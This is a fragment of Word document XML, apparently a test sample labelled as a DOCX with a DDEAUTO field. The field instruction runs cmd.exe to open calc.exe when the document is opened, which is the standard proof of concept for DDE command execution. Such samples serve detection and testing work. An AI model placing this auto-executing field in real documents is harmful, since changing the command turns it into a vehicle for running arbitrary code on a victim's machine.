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DOCX with DDEAUTO field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r/>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/c calc.exe" </w:instrText>
      </w:r>
      <w:r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